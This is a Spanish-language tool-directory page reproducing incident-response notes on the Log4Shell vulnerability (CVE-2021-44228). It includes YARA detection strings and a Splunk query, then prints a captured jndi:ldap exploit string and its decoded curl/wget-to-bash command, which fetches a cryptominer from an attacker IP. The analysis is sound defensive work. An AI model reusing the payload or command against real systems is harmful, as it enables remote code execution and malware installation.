Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228-DFIR-Notes — CVE-2021-44228 Notas de DFIR | Kitploit
Herramientas/GitHubGitHub/azeemering/cve-2021-44228-dfir-notes
Análisis de VulnerabilidadesAnálisis de MalwareForensia DigitalInteligencia de AmenazasAprendizaje y EducaciónRespuesta a IncidentesAnálisis de Registros
GitHubazeemering/cve-2021-44228-dfir-notes

CVE-2021-44228-DFIR-Notes

CVE-2021-44228 Notas de DFIR

Ver Repositorio
722hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44228 Notas de DFIR

Conduciendo a casa me llegaron los primeros mensajes sobre la vulnerabilidad #log4shell.

Una vulnerabilidad de alta gravedad (CVE-2021-44228) que afecta a múltiples versiones de la utilidad Apache Log4j 2 fue divulgada públicamente a través del GitHub del proyecto el 9 de diciembre de 2021. Esta vulnerabilidad, descubierta por Chen Zhaojun del equipo de seguridad de Alibaba Cloud, afecta a las versiones 2.0 a 2.14.1 de Apache Log4j 2.

Me puse manos a la obra en cuanto llegué a casa. Splunk4tw como siempre.

Después de que se publicara el primer exploit de prueba de concepto en GitHub, los actores de amenazas comenzaron a escanear Internet en busca de sistemas vulnerables a esta falla de seguridad explotable de forma remota que no requiere autenticación. Lo que verá a continuación son parte de esos intentos de escaneo y explotación.

Mi primera acción es ver si alguien ha publicado una regla YARA inicial. Lo encontré aquí https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b (Gracias Florian Roth)

Menciona lo siguiente para cadenas de detección: strings: $x1 = "${jndi:ldap:/" $x2 = "${jndi:rmi:/" $x3 = "${jndi:ldaps:/" $x4 = "${jndi:dns:/"

No tengo miedo... abusemos de algunas CPU y vayamos directo al grano con la peor búsqueda de Splunk.

index=* jndi:ldap* (updated query with index=* "{lower:l}${lower:d}a${lower:p}")

Tengo algunos aciertos tanto en mis registros de IIS como en el registro de eventos de Windows (redactado) y muchos intentos bloqueados en el registro del cortafuegos....

IIS: image

WINEVENTLOG: image

Verificando la dirección IP 45.155.205.233.....San Petersburgo, Rusia.....qué sorpresa. image

La cadena encontrada parece una clásica cadena maliciosa ofuscada y codificada de libro de texto. Veamos qué hace:

Decodifiquemos la cadena Base64 usando cyberchef 2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

image

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash

Curl... ejecutar un script de shell, bash....Dios mío. Empiezo a tener una idea de lo que hará esta maldita pieza de trabajo....

Ejecutemos el comando curl en un sandbox:

image

368 líneas de código. (ejecútelo aquí si quiere ver el script completo --> https://reqbin.com/c-ipejxywd

Algunos fragmentos:

image image image

Y después de terminar, incluso limpia los archivos de registro...qué sorpresa:

image

Básicamente intenta instalar un malware llamado Kingsin, que es un minero de criptomonedas. Los objetivos son sistemas nix. Asegúrese de parchear sus sistemas, ya que el exploit probablemente se utilizará para ejecutar todo tipo de payloads.

Gracias a mis compañeros Martijn de Umbrio y Rob [redactado] por un viernes por la noche de debate en whatsapp sobre esto. 00:09 hora de dormir.

#ACTUALIZACIONES y buenos recursos#

  • https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
  • https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
  • https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228

image

Descargar herramienta